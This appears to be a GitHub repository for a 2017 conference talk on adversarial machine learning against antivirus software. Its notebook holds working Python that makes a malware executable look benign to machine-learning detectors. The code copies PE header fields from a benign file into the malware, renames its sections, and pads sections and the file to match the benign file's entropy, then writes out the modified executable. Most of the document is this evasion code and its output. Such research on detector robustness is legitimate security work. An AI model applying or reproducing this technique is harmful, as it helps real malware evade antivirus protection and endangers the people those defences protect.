├── Adversarial Machine Learning for AV software.pdf ├── README.md ├── adversarial_model_for_av.ipynb └── extract.py /Adversarial Machine Learning for AV software.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nababora/advML/2cbc3351a2b1579a1465655df52c41369182bd50/Adversarial Machine Learning for AV software.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Adversarial Machine Learning for Anti-Malware Software 2 | 3 | Presented at Secuinside 2017 by @nababora 4 | 5 | Introduces practical guidance for developing an adversarial machine learning model for anti-malware software. 6 | I haven't used a reinforcement learning model yet; this is just a proof of concept. 7 | 8 | 9 | -------------------------------------------------------------------------------- /adversarial_model_for_av.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 13, 6 | "metadata": { 7 | "collapsed": true 8 | }, 9 | "outputs": [], 10 | "source": [ 11 | "import csv, os, pefile\n", 12 | "import math\n", 13 | "import array\n", 14 | "import random\n", 15 | "import pandas as pd\n", 16 | "\n", 17 | "import extract\n", 18 | "\n", 19 | "class Make_good():\n", 20 | "\n", 21 | " def __init__(self,benign,malware):\n", 22 | "\n", 23 | " header = ['e_cblp','e_cp','e_cparhdr','e_maxalloc','e_sp','e_lfanew',\\\n", 24 | " 'NumofSections','CreationYear','FH3_local_sym','FH4_ws_trim','FH11_file_system','FH13_up_system',\\\n", 25 | " 'Majorlinker','Minorlinker','SizeCode','InitialSize','UninitialSize','EntryPoint','BaseCode','BaseData',\\\n", 26 | " 'MajorOS','MinorOS','MajorImage','MinorImage','MajorSub','MinorSub','Checksum','Subsystem',\\\n", 27 | " 'SReserve','SCommit','HReserve','HCommit','LoaderFlags','DLL3','DLL4','DLL6'] 
#,'sus_sec','e_file','non_sus_sec','packer','e_text','e_data','filesize']\n", 28 | "\n", 29 | " self.benign_path = benign\n", 30 | " self.malware_path = malware \n", 31 | " self.total_list = pd.DataFrame(columns=header)\n", 32 | "\n", 33 | " def print_data(self, pe, clas):\n", 34 | "\n", 35 | " if clas == 1:\n", 36 | " msg = \"Malware\"\n", 37 | " else:\n", 38 | " msg = \"Benign\"\n", 39 | "\n", 40 | " dat = self.get_dos_data(pe) + self.get_file_data(pe) + self.get_optional_data(pe)\n", 41 | " self.total_list.loc[len(self.total_list)] = dat\n", 42 | "\n", 43 | " \n", 44 | " def get_dos_data(self, pe):\n", 45 | "\n", 46 | " dos_data = [pe.DOS_HEADER.e_cblp, pe.DOS_HEADER.e_cp, pe.DOS_HEADER.e_cparhdr, pe.DOS_HEADER.e_maxalloc, pe.DOS_HEADER.e_sp, pe.DOS_HEADER.e_lfanew]\n", 47 | " self.total_list.append(dos_data)\n", 48 | " \n", 49 | " return dos_data\n", 50 | "\n", 51 | " def get_file_data(self, pe):\n", 52 | "\n", 53 | " seconds= pe.FILE_HEADER.TimeDateStamp\n", 54 | " creation_year = 1970 + ((int(seconds) / 86400) / 365)\n", 55 | " \n", 56 | " tmp = [pe.FILE_HEADER.IMAGE_FILE_RELOCS_STRIPPED,\\\n", 57 | " pe.FILE_HEADER.IMAGE_FILE_EXECUTABLE_IMAGE,\\\n", 58 | " pe.FILE_HEADER.IMAGE_FILE_LINE_NUMS_STRIPPED,\\\n", 59 | " pe.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED,\\\n", 60 | " pe.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM,\\\n", 61 | " pe.FILE_HEADER.IMAGE_FILE_LARGE_ADDRESS_AWARE,\\\n", 62 | " pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_LO,\\\n", 63 | " pe.FILE_HEADER.IMAGE_FILE_32BIT_MACHINE,\\\n", 64 | " pe.FILE_HEADER.IMAGE_FILE_DEBUG_STRIPPED,\\\n", 65 | " pe.FILE_HEADER.IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP,\\\n", 66 | " pe.FILE_HEADER.IMAGE_FILE_NET_RUN_FROM_SWAP,\\\n", 67 | " pe.FILE_HEADER.IMAGE_FILE_SYSTEM,\\\n", 68 | " pe.FILE_HEADER.IMAGE_FILE_DLL,\\\n", 69 | " pe.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY,\\\n", 70 | " pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_HI\n", 71 | " ]\n", 72 | " \n", 73 | " \n", 74 | " file_data = [pe.FILE_HEADER.NumberOfSections, 
creation_year, int(tmp[3]), int(tmp[4]), int(tmp[11]), int(tmp[13])]\n", 75 | " \n", 76 | " return file_data\n", 77 | "\n", 78 | " def get_optional_data(self, pe):\n", 79 | "\n", 80 | " tmp = [\n", 81 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,\\\n", 82 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY,\\\n", 83 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NX_COMPAT ,\\\n", 84 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION,\\\n", 85 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH,\\\n", 86 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND,\\\n", 87 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER,\\\n", 88 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,\\\n", 89 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA,\\\n", 90 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_APPCONTAINER,\\\n", 91 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_GUARD_CF\n", 92 | " ]\n", 93 | " \n", 94 | " try:\n", 95 | " optional_data = [\n", 96 | " pe.OPTIONAL_HEADER.MajorLinkerVersion,\\\n", 97 | " pe.OPTIONAL_HEADER.MinorLinkerVersion,\\\n", 98 | " pe.OPTIONAL_HEADER.SizeOfCode,\\\n", 99 | " pe.OPTIONAL_HEADER.SizeOfInitializedData,\\\n", 100 | " pe.OPTIONAL_HEADER.SizeOfUninitializedData,\\\n", 101 | " pe.OPTIONAL_HEADER.AddressOfEntryPoint,\\\n", 102 | " pe.OPTIONAL_HEADER.BaseOfCode,\\\n", 103 | " pe.OPTIONAL_HEADER.BaseOfData,\\\n", 104 | " pe.OPTIONAL_HEADER.MajorOperatingSystemVersion,\\\n", 105 | " pe.OPTIONAL_HEADER.MinorOperatingSystemVersion,\\\n", 106 | " pe.OPTIONAL_HEADER.MajorImageVersion,\\\n", 107 | " pe.OPTIONAL_HEADER.MinorImageVersion,\\\n", 108 | " pe.OPTIONAL_HEADER.MajorSubsystemVersion,\\\n", 109 | " pe.OPTIONAL_HEADER.MinorSubsystemVersion,\\\n", 110 | " pe.OPTIONAL_HEADER.CheckSum,\\\n", 111 | " pe.OPTIONAL_HEADER.Subsystem,\n", 112 | " pe.OPTIONAL_HEADER.SizeOfStackReserve,\\\n", 113 | " pe.OPTIONAL_HEADER.SizeOfStackCommit,\\\n", 114 | " 
pe.OPTIONAL_HEADER.SizeOfHeapReserve,\\\n", 115 | " pe.OPTIONAL_HEADER.SizeOfHeapCommit,\\\n", 116 | " int(pe.OPTIONAL_HEADER.LoaderFlags == 0),\\\n", 117 | " int(tmp[3]), int(tmp[4]), int(tmp[6])]\n", 118 | "\n", 119 | " except Exception, e:\n", 120 | " print e \n", 121 | " \n", 122 | " return optional_data \n", 123 | "\n", 124 | " \n", 125 | " def write_dos_header(self, pe_b, pe_m):\n", 126 | " # total : 4\n", 127 | " pe_m.DOS_HEADER.e_cblp = pe_b.DOS_HEADER.e_cblp\n", 128 | " pe_m.DOS_HEADER.e_cparhdr = pe_b.DOS_HEADER.e_cparhdr\n", 129 | " pe_m.DOS_HEADER.e_maxalloc = pe_b.DOS_HEADER.e_maxalloc\n", 130 | " pe_m.DOS_HEADER.e_sp = pe_b.DOS_HEADER.e_sp\n", 131 | " \n", 132 | " def write_file_header(self, pe_b, pe_m): \n", 133 | " # total : 5\n", 134 | " pe_m.FILE_HEADER.TimeDateStamp = pe_b.FILE_HEADER.TimeDateStamp\n", 135 | " pe_m.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED = pe_b.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED\n", 136 | " pe_m.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM = pe_b.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM\n", 137 | " pe_m.FILE_HEADER.IMAGE_FILE_SYSTEM = pe_b.FILE_HEADER.IMAGE_FILE_SYSTEM \n", 138 | " pe_m.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY = pe_b.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY \n", 139 | " \n", 140 | "\n", 141 | " def write_optional_header(self, pe_b, pe_m):\n", 142 | " # total : 24\n", 143 | " pe_m.OPTIONAL_HEADER.MajorLinkerVersion = pe_b.OPTIONAL_HEADER.MajorLinkerVersion \n", 144 | " pe_m.OPTIONAL_HEADER.MinorLinkerVersion = pe_b.OPTIONAL_HEADER.MinorLinkerVersion\n", 145 | " pe_m.OPTIONAL_HEADER.SizeOfCode = pe_b.OPTIONAL_HEADER.SizeOfCode \n", 146 | " pe_m.OPTIONAL_HEADER.SizeOfInitializedData = pe_b.OPTIONAL_HEADER.SizeOfInitializedData\n", 147 | " pe_m.OPTIONAL_HEADER.SizeOfUninitializedData = pe_b.OPTIONAL_HEADER.SizeOfUninitializedData \n", 148 | " pe_m.OPTIONAL_HEADER.BaseOfCode = pe_b.OPTIONAL_HEADER.BaseOfCode \n", 149 | " pe_m.OPTIONAL_HEADER.BaseOfData = pe_b.OPTIONAL_HEADER.BaseOfData\n", 150 | " 
pe_m.OPTIONAL_HEADER.MajorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MajorOperatingSystemVersion\n", 151 | " pe_m.OPTIONAL_HEADER.MinorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MinorOperatingSystemVersion\n", 152 | " pe_m.OPTIONAL_HEADER.MajorImageVersion = pe_b.OPTIONAL_HEADER.MajorImageVersion\n", 153 | " pe_m.OPTIONAL_HEADER.MinorImageVersion = pe_b.OPTIONAL_HEADER.MinorImageVersion\n", 154 | " pe_m.OPTIONAL_HEADER.MajorSubsystemVersion = pe_b.OPTIONAL_HEADER.MajorSubsystemVersion\n", 155 | " pe_m.OPTIONAL_HEADER.MinorSubsystemVersion = pe_b.OPTIONAL_HEADER.MinorSubsystemVersion\n", 156 | " pe_m.OPTIONAL_HEADER.CheckSum = pe_b.OPTIONAL_HEADER.CheckSum\n", 157 | " pe_m.OPTIONAL_HEADER.Subsystem = pe_b.OPTIONAL_HEADER.Subsystem\n", 158 | " pe_m.OPTIONAL_HEADER.SizeOfStackReserve = pe_b.OPTIONAL_HEADER.SizeOfStackReserve\n", 159 | " pe_m.OPTIONAL_HEADER.SizeOfStackCommit = pe_b.OPTIONAL_HEADER.SizeOfStackCommit\n", 160 | " pe_m.OPTIONAL_HEADER.SizeOfHeapReserve = pe_b.OPTIONAL_HEADER.SizeOfHeapReserve\n", 161 | " pe_m.OPTIONAL_HEADER.SizeOfHeapCommit = pe_b.OPTIONAL_HEADER.SizeOfHeapCommit\n", 162 | " pe_m.OPTIONAL_HEADER.LoaderFlags = pe_b.OPTIONAL_HEADER.LoaderFlags\n", 163 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION\n", 164 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH\n", 165 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND\n", 166 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER\n", 167 | " \n", 168 | " \n", 169 | " def write_extra_info(self, pe_b, pe_m):\n", 170 | " # total : 2\n", 171 | " benign_sections = ['.text', '.rdata','.data','.idata','.edata','.rsrc','.bss','.crt','.tls']\n", 172 | " \n", 173 | " NumSection = pe_m.FILE_HEADER.NumberOfSections\n", 174 | " for i in 
range(0, NumSection):\n", 175 | " pe_m.sections[i].Name = benign_sections[i].encode()\n", 176 | " \n", 177 | " \n", 178 | " def get_start(self, mode):\n", 179 | "\n", 180 | " # get benign pe file with pefile \n", 181 | " try:\n", 182 | " pe_benign = pefile.PE(self.benign_path)\n", 183 | " except Exception, e:\n", 184 | " print \"{} while opening {}\".format(e,self.benign_path)\n", 185 | "\n", 186 | " # get malware pe file with pefile \n", 187 | " try:\n", 188 | " pe_malware = pefile.PE(self.malware_path)\n", 189 | " except Exception, e:\n", 190 | " print \"{} while opening {}\".format(e,self.malware_path)\n", 191 | "\n", 192 | " self.print_data(pe_benign, 0)\n", 193 | " self.print_data(pe_malware, 1)\n", 194 | " \n", 195 | " if mode == 1:\n", 196 | " self.write_dos_header(pe_benign, pe_malware)\n", 197 | " self.write_file_header(pe_benign, pe_malware)\n", 198 | " self.write_optional_header(pe_benign, pe_malware)\n", 199 | " self.write_extra_info(pe_benign, pe_malware)\n", 200 | "\n", 201 | " new_exe_path = \"malware_.exe\"\n", 202 | " pe_malware.write(new_exe_path)\n", 203 | " new_pe = pefile.PE(new_exe_path)\n", 204 | " \n", 205 | " return self.total_list\n", 206 | "\n", 207 | "\n", 208 | " " 209 | ] 210 | }, 211 | { 212 | "cell_type": "code", 213 | "execution_count": 2, 214 | "metadata": { 215 | "collapsed": true 216 | }, 217 | "outputs": [], 218 | "source": [ 219 | "def cal_byteFrequency(byteArr,fileSize):\n", 220 | " freqList = []\n", 221 | " for b in range(256):\n", 222 | " ctr = 0\n", 223 | " for byte in byteArr:\n", 224 | " if byte == b:\n", 225 | " ctr += 1\n", 226 | " freqList.append(float(ctr) / fileSize)\n", 227 | " return freqList\n", 228 | "\n", 229 | "def get_file_entropy(byteArr, fileSize):\n", 230 | " freqList = cal_byteFrequency(byteArr,fileSize)\n", 231 | " # Shannon entropy\n", 232 | " ent = 0.0\n", 233 | " for freq in freqList:\n", 234 | " if freq > 0:\n", 235 | " ent += - freq * math.log(freq, 2)\n", 236 | " return [fileSize,ent]\n", 237 | 
"\n", 238 | "def get_text_data_entropy(pe):\n", 239 | " result=[0.0, 0.0]\n", 240 | " \n", 241 | " for section in pe.sections:\n", 242 | " s_name = section.Name.split('\\x00')[0]\n", 243 | " if s_name == \".text\":\n", 244 | " result[0]= section.get_entropy()\n", 245 | " elif s_name == \".data\":\n", 246 | " result[1]= section.get_entropy()\n", 247 | " else:\n", 248 | " pass\n", 249 | " return result \n", 250 | "\n", 251 | "def get_file_bytes_size(filepath):\n", 252 | " f = open(filepath, \"rb\")\n", 253 | " byteArr = map(ord, f.read())\n", 254 | " f.close()\n", 255 | " fileSize = len(byteArr)\n", 256 | " return byteArr,fileSize\n" 257 | ] 258 | }, 259 | { 260 | "cell_type": "code", 261 | "execution_count": 3, 262 | "metadata": { 263 | "collapsed": true 264 | }, 265 | "outputs": [], 266 | "source": [ 267 | "def write_text_entropy(ben, mal, loo):\n", 268 | " \n", 269 | " ben_pe = pefile.PE(ben)\n", 270 | " mal_pe = pefile.PE(mal)\n", 271 | " \n", 272 | " ben_en = get_text_data_entropy(ben_pe)\n", 273 | " mal_en = get_text_data_entropy(mal_pe)\n", 274 | " \n", 275 | " #print \"[ entropy before ]\", \"\\n ben: \", ben_en[0], \" mal: \", mal_en[0]\n", 276 | " #print \"align: \", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), \" \", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)\n", 277 | " \n", 278 | " insert_mul = loo\n", 279 | " text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul\n", 280 | "\n", 281 | " for section in mal_pe.sections:\n", 282 | "\n", 283 | " s_name = section.Name.split('\\x00')[0]\n", 284 | " if s_name == \".text\":\n", 285 | " start = section.PointerToRawData + section.SizeOfRawData\n", 286 | " section.SizeOfRawData += text_padding\n", 287 | " end = section.PointerToRawData + section.SizeOfRawData\n", 288 | " else:\n", 289 | " section.PointerToRawData += text_padding\n", 290 | "\n", 291 | " #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)\n", 292 | "\n", 
293 | " mal_pe.write(after_t)\n", 294 | " mal_pe.__data__.close()\n", 295 | " bytearr, _ = get_file_bytes_size(after_t)\n", 296 | " \n", 297 | " if ben_en[0] > mal_en[0]:\n", 298 | " bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]\n", 299 | " else:\n", 300 | " bytearr[start:text_padding] = [0 for i in range(0, text_padding)]\n", 301 | "\n", 302 | " #print l, ar\n", 303 | " #print len(bytearr), bytearr[start:end]\n", 304 | "\n", 305 | " byte = array.array('B', bytearr).tostring()\n", 306 | " f = open(after_t, 'wb')\n", 307 | " f.write(byte)\n", 308 | " f.close()\n", 309 | "\n", 310 | " new_pe = pefile.PE(after_t)\n", 311 | " new_en = get_text_data_entropy(new_pe)\n", 312 | " bytearr, _ = get_file_bytes_size(after_t)\n", 313 | " #print bytearr[start:end], len(bytearr[start:end])\n", 314 | "\n", 315 | " diff = abs(new_en[0] - ben_en[0])\n", 316 | " print \"* text section entropy :\", mal_en[0], \"->\", new_en[0], \" diff: \", diff\n", 317 | "\n", 318 | " return diff, new_en[0]\n" 319 | ] 320 | }, 321 | { 322 | "cell_type": "code", 323 | "execution_count": 4, 324 | "metadata": { 325 | "collapsed": true 326 | }, 327 | "outputs": [], 328 | "source": [ 329 | "def write_data_entropy(ben, mal, loo):\n", 330 | " \n", 331 | " ben_pe = pefile.PE(ben)\n", 332 | " mal_pe = pefile.PE(mal)\n", 333 | " \n", 334 | " ben_en = get_text_data_entropy(ben_pe)\n", 335 | " mal_en = get_text_data_entropy(mal_pe)\n", 336 | " \n", 337 | " #print \"[ entropy before ]\", \"\\n ben: \", ben_en[1], \" mal: \", mal_en[1]\n", 338 | " #print \"align: \", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), \" \", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)\n", 339 | " \n", 340 | " insert_mul = loo\n", 341 | " text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul\n", 342 | "\n", 343 | " for section in mal_pe.sections:\n", 344 | "\n", 345 | " s_name = section.Name.split('\\x00')[0]\n", 346 | " if s_name == \".data\":\n", 347 | " start = 
section.PointerToRawData + section.SizeOfRawData\n", 348 | " section.SizeOfRawData += text_padding\n", 349 | " end = section.PointerToRawData + section.SizeOfRawData\n", 350 | " elif s_name != \".text\" and s_name != \".data\":\n", 351 | " section.PointerToRawData += text_padding\n", 352 | "\n", 353 | " #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)\n", 354 | "\n", 355 | " mal_pe.write(after_d)\n", 356 | " mal_pe.__data__.close()\n", 357 | " bytearr, _ = get_file_bytes_size(after_d)\n", 358 | " if ben_en[1] > mal_en[1]:\n", 359 | " bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]\n", 360 | " else:\n", 361 | " bytearr[start:text_padding] = [0 for i in range(0, text_padding)]\n", 362 | "\n", 363 | " #print l, ar\n", 364 | " #print len(bytearr), bytearr[start:end]\n", 365 | "\n", 366 | " byte = array.array('B', bytearr).tostring()\n", 367 | " f = open(after_d, 'wb')\n", 368 | " f.write(byte)\n", 369 | " f.close()\n", 370 | "\n", 371 | " new_pe = pefile.PE(after_d)\n", 372 | " new_en = get_text_data_entropy(new_pe)\n", 373 | " bytearr, _ = get_file_bytes_size(after_d)\n", 374 | " #print bytearr[start:end], len(bytearr[start:end])\n", 375 | "\n", 376 | " diff = abs(new_en[1] - ben_en[1])\n", 377 | " print \"* data section entropy :\", mal_en[1], \"->\", new_en[1], \" diff: \", diff\n", 378 | "\n", 379 | " return diff, new_en[1]\n", 380 | "\n" 381 | ] 382 | }, 383 | { 384 | "cell_type": "code", 385 | "execution_count": 5, 386 | "metadata": { 387 | "collapsed": true 388 | }, 389 | "outputs": [], 390 | "source": [ 391 | "def write_file_entropy(ben, mal):\n", 392 | " \n", 393 | " save = 0\n", 394 | " rns = 0\n", 395 | " \n", 396 | " ben_byte, ben_size = get_file_bytes_size(ben)\n", 397 | " mal_byte, mal_size = get_file_bytes_size(mal)\n", 398 | "\n", 399 | " _, ben_en = get_file_entropy(ben_byte, ben_size)\n", 400 | " _, mal_en = 
get_file_entropy(mal_byte, mal_size)\n", 401 | " \n", 402 | " \n", 403 | " diff_bak = 10.0\n", 404 | " \n", 405 | " print \"File entropy before: \", ben_en, \" \", mal_en, \" diff_bak: \", diff_bak \n", 406 | " \n", 407 | " \n", 408 | " for di in range(1, 100):\n", 409 | " \n", 410 | " if save:\n", 411 | " di = di -1\n", 412 | " \n", 413 | " bytearr = mal_byte\n", 414 | " append_size = 4096*di\n", 415 | " \n", 416 | " if ben_en < mal_en:\n", 417 | " appen = [0 for i in xrange(append_size)]\n", 418 | " bytearr.extend(appen)\n", 419 | " else:\n", 420 | " appen = [random.sample(range(255), 1)[0] for i in xrange(append_size)]\n", 421 | " bytearr.extend(appen)\n", 422 | "\n", 423 | " size, ent = get_file_entropy(bytearr, (mal_size + append_size))\n", 424 | " diff = abs(ben_en - ent)\n", 425 | " print \"entropy after :\", mal_en, \" -> \", ent, \" diff: \", diff\n", 426 | "\n", 427 | " if diff_bak < diff:\n", 428 | " save = 1\n", 429 | "\n", 430 | " else:\n", 431 | " diff_bak = diff\n", 432 | " \n", 433 | " if save:\n", 434 | " rns = ent\n", 435 | " byte = array.array('B', bytearr).tostring()\n", 436 | " f = open(final, 'wb')\n", 437 | " f.write(byte)\n", 438 | " f.close()\n", 439 | " break\n", 440 | " \n", 441 | " return rns\n" 442 | ] 443 | }, 444 | { 445 | "cell_type": "code", 446 | "execution_count": 14, 447 | "metadata": {}, 448 | "outputs": [ 449 | { 450 | "name": "stdout", 451 | "output_type": "stream", 452 | "text": [ 453 | "[*] Before Crafting Malware Sample \n" 454 | ] 455 | }, 456 | { 457 | "data": { 458 | "text/html": [ 459 | "
\n", 477 | " | e_cblp | \n", 478 | "e_cp | \n", 479 | "e_cparhdr | \n", 480 | "e_maxalloc | \n", 481 | "e_sp | \n", 482 | "e_lfanew | \n", 483 | "NumofSections | \n", 484 | "CreationYear | \n", 485 | "FH3_local_sym | \n", 486 | "FH4_ws_trim | \n", 487 | "... | \n", 488 | "Checksum | \n", 489 | "Subsystem | \n", 490 | "SReserve | \n", 491 | "SCommit | \n", 492 | "HReserve | \n", 493 | "HCommit | \n", 494 | "LoaderFlags | \n", 495 | "DLL3 | \n", 496 | "DLL4 | \n", 497 | "DLL6 | \n", 498 | "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", 503 | "144 | \n", 504 | "3 | \n", 505 | "4 | \n", 506 | "65535 | \n", 507 | "184 | \n", 508 | "280 | \n", 509 | "5 | \n", 510 | "2017 | \n", 511 | "0 | \n", 512 | "0 | \n", 513 | "... | \n", 514 | "2727685 | \n", 515 | "2 | \n", 516 | "1048576 | \n", 517 | "4096 | \n", 518 | "1048576 | \n", 519 | "4096 | \n", 520 | "1 | \n", 521 | "0 | \n", 522 | "0 | \n", 523 | "0 | \n", 524 | "
1 | \n", 527 | "80 | \n", 528 | "2 | \n", 529 | "4 | \n", 530 | "65535 | \n", 531 | "184 | \n", 532 | "256 | \n", 533 | "8 | \n", 534 | "1992 | \n", 535 | "1 | \n", 536 | "0 | \n", 537 | "... | \n", 538 | "684332 | \n", 539 | "2 | \n", 540 | "1048576 | \n", 541 | "16384 | \n", 542 | "1048576 | \n", 543 | "4096 | \n", 544 | "1 | \n", 545 | "0 | \n", 546 | "0 | \n", 547 | "0 | \n", 548 | "
2 rows × 36 columns
\n", 552 | "